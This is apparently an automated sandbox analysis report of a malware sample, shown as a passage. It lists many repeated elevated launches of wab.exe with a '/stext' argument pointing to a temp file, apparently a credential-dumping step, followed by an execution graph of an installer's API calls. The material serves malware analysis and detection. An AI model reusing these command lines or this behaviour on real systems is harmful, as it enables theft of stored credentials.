                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:16
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:17
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:18
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:19
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:20
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:21
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:22
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:23
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:24
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:25
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:26
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:27
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:28
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:29
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:30
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:31
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:32
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:33
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:34
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:35
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:36
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:37
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:38
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:39
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:40
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:41
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:42
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:43
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true


                                                            Execution Graph

                                                            Execution Coverage:21.2%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:25%
                                                            Total number of Nodes:1450
                                                            Total number of Limit Nodes:36
3890->3891 3892 401e61 3891->3892 4760 1000194f GetCommandLineW lstrcpynW 4761 100019a3 4760->4761 4762 100019c4 CharNextW 4761->4762 4763 100019b9 CharNextW 4761->4763 4765 100019c9 CreateProcessW 4762->4765 4763->4761 4766 100019f7 WaitForSingleObject GetExitCodeProcess CloseHandle CloseHandle ExitProcess 4765->4766 4767 10001a28 ExitProcess 4765->4767 4768 404390 lstrlenW 4769 4043b1 WideCharToMultiByte 4768->4769 4770 4043af 4768->4770 4770->4769 4771 401491 4772 4052dd 25 API calls 4771->4772 4773 401498 4772->4773 4781 401a15 4782 402bbf 18 API calls 4781->4782 4783 401a1e ExpandEnvironmentStringsW 4782->4783 4784 401a32 4783->4784 4786 401a45 4783->4786 4785 401a37 lstrcmpW 4784->4785 4784->4786 4785->4786 4787 402515 4788 402bbf 18 API calls 4787->4788 4789 40251c 4788->4789 4792 405d53 GetFileAttributesW CreateFileW 4789->4792 4791 402528 4792->4791 4793 402095 4794 402bbf 18 API calls 4793->4794 4795 40209c 4794->4795 4796 402bbf 18 API calls 4795->4796 4797 4020a6 4796->4797 4798 402bbf 18 API calls 4797->4798 4799 4020b0 4798->4799 4800 402bbf 18 API calls 4799->4800 4801 4020ba 4800->4801 4802 402bbf 18 API calls 4801->4802 4804 4020c4 4802->4804 4803 402103 CoCreateInstance 4808 402122 4803->4808 4804->4803 4805 402bbf 18 API calls 4804->4805 4805->4803 4806 401423 25 API calls 4807 4021e1 4806->4807 4808->4806 4808->4807 4809 401b16 4810 402bbf 18 API calls 4809->4810 4811 401b1d 4810->4811 4812 402ba2 18 API calls 4811->4812 4813 401b26 wsprintfW 4812->4813 4814 402a4c 4813->4814 4815 404696 4816 4046a6 4815->4816 4817 4046cc 4815->4817 4819 404242 19 API calls 4816->4819 4818 4042a9 8 API calls 4817->4818 4820 4046d8 4818->4820 4821 4046b3 SetDlgItemTextW 4819->4821 4821->4817 4012 1000105a 4015 10001112 4012->4015 4094 10001096 GetModuleHandleW GetProcAddress 4015->4094 4018 10001147 GetModuleFileNameW GlobalAlloc 4021 1000118e 4018->4021 4019 1000128c GlobalAlloc 4020 100012aa 4019->4020 4022 100012c2 FindWindowExW FindWindowExW 4020->4022 4035 
100012e4 4020->4035 4023 10001194 CharPrevW 4021->4023 4024 100011ae 4021->4024 4022->4035 4023->4021 4023->4024 4026 100011b8 4024->4026 4027 100011ce GetTempFileNameW CopyFileW 4024->4027 4107 10001a73 4026->4107 4029 10001203 CreateFileW CreateFileMappingW MapViewOfFile 4027->4029 4030 1000126d lstrcatW lstrlenW 4027->4030 4031 10001239 UnmapViewOfFile 4029->4031 4032 1000125f CloseHandle CloseHandle 4029->4032 4030->4020 4031->4032 4032->4030 4034 100011c2 GlobalFree 4036 10001085 4034->4036 4037 1000130a lstrcmpiW 4035->4037 4097 10001a33 4035->4097 4102 10001849 lstrlenW lstrlenW 4035->4102 4037->4035 4038 10001326 4037->4038 4039 10001357 GetVersion 4038->4039 4040 1000132b 4038->4040 4042 100013ca GlobalAlloc 4039->4042 4043 100013fc 4039->4043 4041 10001a73 2 API calls 4040->4041 4044 10001335 4041->4044 4049 100016f8 lstrcpyW 4042->4049 4054 100013f2 GlobalLock 4042->4054 4046 10001424 CreatePipe 4043->4046 4047 10001406 InitializeSecurityDescriptor SetSecurityDescriptorDacl 4043->4047 4044->4034 4053 10001349 DeleteFileW 4044->4053 4048 10001441 CreatePipe 4046->4048 4046->4049 4047->4046 4048->4049 4052 10001458 GetStartupInfoW CreateProcessW 4048->4052 4051 1000170a 4049->4051 4055 10001710 4051->4055 4056 10001718 4051->4056 4052->4049 4057 100014a6 GetTickCount 4052->4057 4053->4034 4054->4043 4058 10001a73 2 API calls 4055->4058 4060 10001731 4056->4060 4062 10001726 4056->4062 4059 100014af 4057->4059 4058->4056 4059->4051 4061 100014c2 PeekNamedPipe 4059->4061 4071 100016c0 Sleep 4059->4071 4072 10001692 GetTickCount 4059->4072 4063 1000173a lstrcpyW 4060->4063 4064 1000174c 4060->4064 4061->4059 4065 100014dc GetTickCount ReadFile 4061->4065 4066 100017dd 3 API calls 4062->4066 4063->4064 4067 10001755 wsprintfW 4064->4067 4068 1000176d 4064->4068 4110 100010d3 lstrlenA 4065->4110 4070 1000172f 4066->4070 4067->4068 4073 10001a73 2 API calls 4068->4073 4070->4060 4075 100016c8 WaitForSingleObject GetExitCodeProcess PeekNamedPipe 4071->4075 
4072->4071 4074 100016a1 TerminateProcess lstrcpyW 4072->4074 4076 10001779 6 API calls 4073->4076 4074->4075 4075->4059 4077 100017a8 4076->4077 4079 100017b1 DeleteFileW 4077->4079 4080 100017ba GlobalFree 4077->4080 4078 10001520 lstrlenW 4081 10001550 lstrlenW GlobalSize 4078->4081 4082 10001531 lstrlenW lstrcpynW 4078->4082 4079->4080 4080->4036 4083 100017ca GlobalUnlock GlobalFree 4080->4083 4084 1000156d GlobalUnlock GlobalReAlloc 4081->4084 4085 1000159e lstrcatW 4081->4085 4082->4075 4083->4036 4084->4049 4086 10001594 GlobalLock 4084->4086 4091 10001514 4085->4091 4086->4085 4087 10001849 5 API calls 4087->4091 4088 100015b2 GlobalSize 4089 100015d4 lstrlenW 4088->4089 4088->4091 4090 100015f3 lstrcpyW 4089->4090 4089->4091 4090->4091 4091->4075 4091->4078 4091->4087 4091->4088 4091->4090 4092 1000165f CharNextW 4091->4092 4114 100017dd 4091->4114 4092->4091 4095 100010b8 GetCurrentProcess 4094->4095 4096 100010c5 4094->4096 4095->4096 4096->4018 4096->4019 4098 10001a6c 4097->4098 4099 10001a3d 4097->4099 4098->4035 4099->4098 4100 10001a4a lstrcpyW 4099->4100 4101 10001a5d GlobalFree 4099->4101 4100->4101 4101->4098 4103 100018a4 4102->4103 4104 1000186a lstrcmpiW 4102->4104 4103->4035 4104->4103 4106 10001893 CharNextW lstrlenW 4104->4106 4106->4103 4106->4104 4108 10001ab6 4107->4108 4109 10001a7c GlobalAlloc lstrcpynW 4107->4109 4108->4034 4109->4108 4111 10001102 lstrcpyW 4110->4111 4112 100010ee MultiByteToWideChar 4110->4112 4113 1000110c 4111->4113 4112->4113 4113->4091 4115 10001845 4114->4115 4116 100017fd SendMessageW SendMessageW SendMessageW 4114->4116 4115->4091 4116->4115 4822 40159b 4823 402bbf 18 API calls 4822->4823 4824 4015a2 SetFileAttributesW 4823->4824 4825 4015b4 4824->4825 4137 40541c 4138 4055c6 4137->4138 4139 40543d GetDlgItem GetDlgItem GetDlgItem 4137->4139 4141 4055f7 4138->4141 4142 4055cf GetDlgItem CreateThread FindCloseChangeNotification 4138->4142 4183 404277 SendMessageW 4139->4183 4144 405622 4141->4144 4147 405647 
4141->4147 4148 40560e ShowWindow ShowWindow 4141->4148 4142->4141 4186 4053b0 5 API calls 4142->4186 4143 4054ad 4152 4054b4 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4143->4152 4145 405682 4144->4145 4146 40562e 4144->4146 4145->4147 4159 405690 SendMessageW 4145->4159 4149 405636 4146->4149 4150 40565c ShowWindow 4146->4150 4151 4042a9 8 API calls 4147->4151 4185 404277 SendMessageW 4148->4185 4154 40421b SendMessageW 4149->4154 4155 40567c 4150->4155 4156 40566e 4150->4156 4164 405655 4151->4164 4157 405522 4152->4157 4158 405506 SendMessageW SendMessageW 4152->4158 4154->4147 4161 40421b SendMessageW 4155->4161 4160 4052dd 25 API calls 4156->4160 4162 405535 4157->4162 4163 405527 SendMessageW 4157->4163 4158->4157 4159->4164 4165 4056a9 CreatePopupMenu 4159->4165 4160->4155 4161->4145 4166 404242 19 API calls 4162->4166 4163->4162 4167 4061a0 18 API calls 4165->4167 4169 405545 4166->4169 4168 4056b9 AppendMenuW 4167->4168 4170 4056d6 GetWindowRect 4168->4170 4171 4056e9 TrackPopupMenu 4168->4171 4172 405582 GetDlgItem SendMessageW 4169->4172 4173 40554e ShowWindow 4169->4173 4170->4171 4171->4164 4174 405704 4171->4174 4172->4164 4177 4055a9 SendMessageW SendMessageW 4172->4177 4175 405571 4173->4175 4176 405564 ShowWindow 4173->4176 4178 405720 SendMessageW 4174->4178 4184 404277 SendMessageW 4175->4184 4176->4175 4177->4164 4178->4178 4179 40573d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4178->4179 4181 405762 SendMessageW 4179->4181 4181->4181 4182 40578b GlobalUnlock SetClipboardData CloseClipboard 4181->4182 4182->4164 4183->4143 4184->4172 4185->4144 4826 401f1d 4827 402bbf 18 API calls 4826->4827 4828 401f24 4827->4828 4829 406558 5 API calls 4828->4829 4830 401f33 4829->4830 4831 401f4f GlobalAlloc 4830->4831 4840 401fb7 4830->4840 4832 401f63 4831->4832 4831->4840 4833 406558 5 API calls 4832->4833 4834 401f6a 4833->4834 4835 406558 5 API calls 4834->4835 4836 401f74 4835->4836 4836->4840 4841 4060c5 wsprintfW 4836->4841 
4838 401fa9 4842 4060c5 wsprintfW 4838->4842 4841->4838 4842->4840 4843 40229d 4844 4022a5 4843->4844 4845 4022ab 4843->4845 4846 402bbf 18 API calls 4844->4846 4847 4022b9 4845->4847 4848 402bbf 18 API calls 4845->4848 4846->4845 4849 402bbf 18 API calls 4847->4849 4851 4022c7 4847->4851 4848->4847 4849->4851 4850 402bbf 18 API calls 4852 4022d0 WritePrivateProfileStringW 4850->4852 4851->4850 4187 40249e 4197 402cc9 4187->4197 4189 4024a8 4190 402ba2 18 API calls 4189->4190 4191 4024b1 4190->4191 4192 4024d5 RegEnumValueW 4191->4192 4193 4024c9 RegEnumKeyW 4191->4193 4195 40281e 4191->4195 4194 4024ee RegCloseKey 4192->4194 4192->4195 4193->4194 4194->4195 4198 402bbf 18 API calls 4197->4198 4199 402ce2 4198->4199 4200 402cf0 RegOpenKeyExW 4199->4200 4200->4189 4853 40149e 4854 402288 4853->4854 4855 4014ac PostQuitMessage 4853->4855 4855->4854 4856 40231f 4857 402324 4856->4857 4858 40234f 4856->4858 4859 402cc9 19 API calls 4857->4859 4860 402bbf 18 API calls 4858->4860 4861 40232b 4859->4861 4862 402356 4860->4862 4863 402bbf 18 API calls 4861->4863 4864 40236c 4861->4864 4867 402bff RegOpenKeyExW 4862->4867 4866 40233c RegDeleteValueW RegCloseKey 4863->4866 4866->4864 4868 402c2a 4867->4868 4874 402c76 4867->4874 4869 402c50 RegEnumKeyW 4868->4869 4870 402c62 RegCloseKey 4868->4870 4872 402c87 RegCloseKey 4868->4872 4875 402bff 5 API calls 4868->4875 4869->4868 4869->4870 4871 406558 5 API calls 4870->4871 4873 402c72 4871->4873 4872->4874 4873->4874 4876 402ca2 RegDeleteKeyW 4873->4876 4874->4864 4875->4868 4876->4874 4877 401ca3 4878 402ba2 18 API calls 4877->4878 4879 401ca9 IsWindow 4878->4879 4880 401a05 4879->4880 4881 402a27 SendMessageW 4882 402a41 InvalidateRect 4881->4882 4883 402a4c 4881->4883 4882->4883 4884 40242a 4885 402cc9 19 API calls 4884->4885 4886 402434 4885->4886 4887 402bbf 18 API calls 4886->4887 4888 40243d 4887->4888 4889 402448 RegQueryValueExW 4888->4889 4894 40281e 4888->4894 4890 40246e RegCloseKey 4889->4890 4891 402468 
4889->4891 4890->4894 4891->4890 4895 4060c5 wsprintfW 4891->4895 4895->4890 4903 40172d 4904 402bbf 18 API calls 4903->4904 4905 401734 SearchPathW 4904->4905 4906 40174f 4905->4906 4907 404a33 4908 404a43 4907->4908 4909 404a5f 4907->4909 4918 4058a7 GetDlgItemTextW 4908->4918 4911 404a92 4909->4911 4912 404a65 SHGetPathFromIDListW 4909->4912 4914 404a7c SendMessageW 4912->4914 4915 404a75 4912->4915 4913 404a50 SendMessageW 4913->4909 4914->4911 4916 40140b 2 API calls 4915->4916 4916->4914 4918->4913 4919 4027b4 4920 4027ba 4919->4920 4921 4027c2 FindClose 4920->4921 4922 402a4c 4920->4922 4921->4922 3389 4033b6 SetErrorMode GetVersion 3390 4033eb 3389->3390 3391 4033f1 3389->3391 3392 406558 5 API calls 3390->3392 3477 4064e8 GetSystemDirectoryW 3391->3477 3392->3391 3394 403407 lstrlenA 3394->3391 3395 403417 3394->3395 3480 406558 GetModuleHandleA 3395->3480 3398 406558 5 API calls 3399 403426 #17 OleInitialize SHGetFileInfoW 3398->3399 3486 40617e lstrcpynW 3399->3486 3401 403463 GetCommandLineW 3487 40617e lstrcpynW 3401->3487 3403 403475 GetModuleHandleW 3404 40348d 3403->3404 3405 405b5f CharNextW 3404->3405 3406 40349c CharNextW 3405->3406 3407 4035c6 GetTempPathW 3406->3407 3414 4034b5 3406->3414 3488 403385 3407->3488 3409 4035de 3410 4035e2 GetWindowsDirectoryW lstrcatW 3409->3410 3411 403638 DeleteFileW 3409->3411 3415 403385 12 API calls 3410->3415 3498 402e41 GetTickCount GetModuleFileNameW 3411->3498 3412 405b5f CharNextW 3412->3414 3414->3412 3419 4035af 3414->3419 3421 4035b1 3414->3421 3417 4035fe 3415->3417 3416 40364c 3424 405b5f 